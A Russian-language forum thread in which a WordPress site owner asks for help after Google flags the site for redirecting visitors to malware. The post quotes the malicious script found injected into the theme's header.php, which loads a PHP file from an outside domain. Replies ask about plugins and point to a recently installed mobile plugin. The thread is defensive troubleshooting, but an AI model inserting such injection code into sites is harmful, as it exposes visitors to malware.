Наверняка подобные вопросы уже обсуждались, но сожалению не увидел опции поиска на этом форуме…
Проблема в следующем – недавно Гугл прислал уведомление о том, что мой сайт на WP перенаправляет посетителей на сайт, содержащий вредоносное ПО, соответственно и мой сайт получил "черную метку от Гугла".
На сайте стоит антивирусный плагин WP Antivirus Site Protection, но сканирование результатов не дало. Вручную просмотрев шаблоны обнаружил в header.php подозрительный скрипт с какой-то левой ссылкой:
$yslq = "<script type=\"text/javascript\" src=\"http://www.czechwines.cz/lide/osoby/twxyqgwj.php?id=649925\"></script>";
<?php
#7f3f8c#
if(empty($yslq)) {
echo $yslq;
}
#/7f3f8c#
?>
Удалил эту бяку, поменял пароль к админке, отписался в Гугл и метку сняли. Однако, по прошествии недели опять пришло письмо от Гугла! Каково было удивление, когда на том же самом месте нашел тот же скрипт, только со ссылкой на другой сайт.
Скрипт удалил, поменял еще и пароль к ФТП (хотя был он довольно сложный), но остаются опасения, что где-то сидит еще какой-то хитрый скрипт, периодически оживляющий эти ссылки.
Вопрос к специалистам: что можно сделать? Готов оплатить реальную помощь.
Ссылки с сайта продаёте?
И версию wp + список плагинов + шаблон узнать бы?
Ссылки продаю исключительно в ручном режиме, без установки скриптов Сапы и прочих подобных бирж.
Версия WordPress 3.2.1. , шаблон из готовых, но тщательно вычищен перед установкой тема red_light, установлен был пару лет назад. Вообще, я этот сайт покупал уже готовым, владею им уже два года.
Плагины такие стоят:
All in One SEO Pack
Captcha
Contact Form 7
Dagon Design Sitemap Generator
Disable WordPress Updates
Google XML Sitemaps
KeyCAPTCHA
Lightbox 2
Limit Posts
My Category Order
My Page Order
RusToLat
Theme Authenticity Checker (TAC)
TimThumb Vulnerability Scanner
Ultimate Category Excluder
WordPress Related Posts
WP Antivirus Site Protection (by SiteGuarding.com)
WP Mobile Edition
Все кроме последнего установлены еще прежним хозяином, а WP Mobile Edition устанавливал я сам с месяц назад, т.е. вирус появился в аккурат после его установки…
Попробуйте снесите его. А скачивали его из официального источника?